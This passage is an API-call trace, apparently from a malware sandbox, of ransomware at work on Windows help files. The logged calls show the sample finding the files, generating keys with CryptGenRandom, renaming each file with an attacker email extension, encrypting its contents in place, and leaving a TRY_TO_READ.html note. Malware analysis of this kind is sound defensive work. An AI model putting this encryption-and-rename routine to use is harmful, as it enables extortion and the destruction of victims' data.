ftLastWriteTime.dwLowDateTime=0x5269fec0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.VISIO.14.1033.hxn", cAlternateFileName="MSVISI~1.HXN")) returned 1 [0161.270] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x523a6340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x523a6340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x527122e0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.VISIO.DEV.14.1033.hxn", cAlternateFileName="MSVISI~3.HXN")) returned 1 [0161.270] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x523a6340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x523a6340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x52738440, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.VISIO.SHAPESHEET.14.1033.hxn", cAlternateFileName="MSVISI~4.HXN")) returned 1 [0161.270] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x523a6340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x523a6340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x52738440, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.VISIO_PRM.14.1033.hxn", cAlternateFileName="MSE1C9~1.HXN")) returned 1 [0161.270] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x523a6340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x523a6340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x527122e0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.VISIO_STD.14.1033.hxn", cAlternateFileName="MSVISI~2.HXN")) returned 1 [0161.270] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xaf766ee0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xaf766ee0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xaf7d9300, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.WINPROJ.14.1033.hxn", cAlternateFileName="MSWINP~1.HXN")) returned 1 [0161.270] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xaf766ee0, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xaf766ee0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xaf7d9300, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x16a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.WINPROJ.DEV.14.1033.hxn", cAlternateFileName="MSWINP~2.HXN")) returned 1 [0161.270] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x1e67e130, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1e67e130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1e6f0550, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.WINWORD.14.1033.hxn", cAlternateFileName="MSWINW~1.HXN")) returned 1 [0161.270] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x1e67e130, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1e67e130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1e6f0550, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x16a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.WINWORD.DEV.14.1033.hxn", cAlternateFileName="MSWINW~2.HXN")) returned 1 [0161.270] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xe80ff230, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0xe80ff230, ftLastAccessTime.dwHighDateTime=0x1d2dda1, ftLastWriteTime.dwLowDateTime=0xe8b8c220, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x21dc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nslist.hxl", cAlternateFileName="")) returned 1 [0161.271] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x978f4db0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x978f4db0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978f4db0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0161.271] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x978f4db0, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x978f4db0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978f4db0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0161.271] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.271] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.271] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl", dwFileAttributes=0x80) returned 1 [0161.271] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl") returned 45 [0161.271] GetProcessHeap () returned 0x2e0000 [0161.271] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc0) returned 0x31d0048 [0161.271] lstrcpyW (in: lpString1=0x31d0048, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl") returned="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl" [0161.271] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl.12781717671972518758.ex_parvis@aol.com.AIR" [0161.271] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl" (normalized: "c:\\users\\all users\\microsoft help\\nslist.hxl"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\nslist.hxl.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.274] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\nslist.hxl.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\nslist.hxl.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.274] GetProcessHeap () returned 0x2e0000 [0161.274] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x31d0048 | out: hHeap=0x2e0000) returned 1 [0161.274] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=8668) returned 1 [0161.274] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x21dc [0161.274] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.274] GetProcessHeap () returned 0x2e0000 [0161.274] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.274] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.274] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.276] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.276] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.276] ReadFile (in: hFile=0x4d8, lpBuffer=0x3af410, nNumberOfBytesToRead=0x21dc, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3af410*, lpNumberOfBytesRead=0x2acf9c8*=0x21dc, lpOverlapped=0x0) returned 1 [0161.277] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.277] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.277] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0161.278] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn") returned 61 [0161.278] GetProcessHeap () returned 0x2e0000 [0161.278] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe0) returned 0x319d30 [0161.278] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" [0161.278] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" [0161.278] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.dev.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.280] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.280] GetProcessHeap () returned 0x2e0000 [0161.280] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0161.280] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=362) returned 1 [0161.280] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x16a [0161.280] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.281] GetProcessHeap () returned 0x2e0000 [0161.281] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.281] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.281] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.282] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.282] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.282] ReadFile (in: hFile=0x4d8, lpBuffer=0x30a498, nNumberOfBytesToRead=0x16a, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesRead=0x2acf9c8*=0x16a, lpOverlapped=0x0) returned 1 [0161.282] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-362, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.282] WriteFile (in: hFile=0x4d8, lpBuffer=0x319788*, nNumberOfBytesToWrite=0x16a, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x319788*, lpNumberOfBytesWritten=0x2acf9c8*=0x16a, lpOverlapped=0x0) returned 1 [0161.282] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.282] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.282] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0161.283] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn") returned 57 [0161.283] GetProcessHeap () returned 0x2e0000 [0161.283] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd8) returned 0x319d30 [0161.283] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn" [0161.283] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" [0161.283] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.286] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINWORD.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.winword.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.286] GetProcessHeap () returned 0x2e0000 [0161.286] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0161.286] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=338) returned 1 [0161.286] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x152 [0161.286] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.286] GetProcessHeap () returned 0x2e0000 [0161.286] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.286] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.286] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.287] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.287] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.288] ReadFile (in: hFile=0x4d8, lpBuffer=0x31fae0, nNumberOfBytesToRead=0x152, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31fae0*, lpNumberOfBytesRead=0x2acf9c8*=0x152, lpOverlapped=0x0) returned 1 [0161.288] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-338, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.288] WriteFile (in: hFile=0x4d8, lpBuffer=0x30a498*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesWritten=0x2acf9c8*=0x152, lpOverlapped=0x0) returned 1 [0161.288] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.288] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.288] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0161.293] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn") returned 61 [0161.293] GetProcessHeap () returned 0x2e0000 [0161.293] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xe0) returned 0x3ac428 [0161.293] lstrcpyW (in: lpString1=0x3ac428, lpString2="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" [0161.293] lstrcatW (in: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" [0161.293] MoveFileExW (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.dev.14.1033.hxn"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.296] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.DEV.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\all users\\microsoft help\\ms.winproj.dev.14.1033.hxn.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d8 [0161.296] GetProcessHeap () returned 0x2e0000 [0161.296] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x3ac428 | out: hHeap=0x2e0000) returned 1 [0161.296] GetFileSizeEx (in: hFile=0x4d8, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=362) returned 1 [0161.296] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x16a [0161.296] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.296] GetProcessHeap () returned 0x2e0000 [0161.296] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.296] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.296] WriteFile (in: hFile=0x4d8, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.298] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.298] WriteFile (in: hFile=0x4d8, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.298] ReadFile (in: hFile=0x4d8, lpBuffer=0x30a498, nNumberOfBytesToRead=0x16a, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x30a498*, lpNumberOfBytesRead=0x2acf9c8*=0x16a, lpOverlapped=0x0) returned 1 [0161.298] SetFilePointer (in: hFile=0x4d8, lDistanceToMove=-362, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.298] WriteFile (in: hFile=0x4d8, lpBuffer=0x319788*, nNumberOfBytesToWrite=0x16a, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x319788*, lpNumberOfBytesWritten=0x2acf9c8*=0x16a, lpOverlapped=0x0) returned 1 [0161.298] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.298] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.298] SetFileAttributesW (lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn", dwFileAttributes=0x80) returned 1 [0161.299] lstrlenW (lpString="C:\\\\Users\\All Users\\Microsoft Help\\MS.WINPROJ.14.1033.hxn") returned 57 [0161.299] GetProcessHeap () returned 0x2e0000 [0161.299] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xd8) returned 0x319d30 [0161.299] 